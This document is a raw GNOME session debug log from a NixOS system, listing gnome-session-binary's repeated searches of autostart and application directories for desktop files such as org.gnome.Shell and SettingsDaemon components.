machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/share/applications/org.gnome.Shell.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.A11ySettings.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/share/applications/org.gnome.Shell.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.A11ySettings.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.A11ySettings.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Color.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
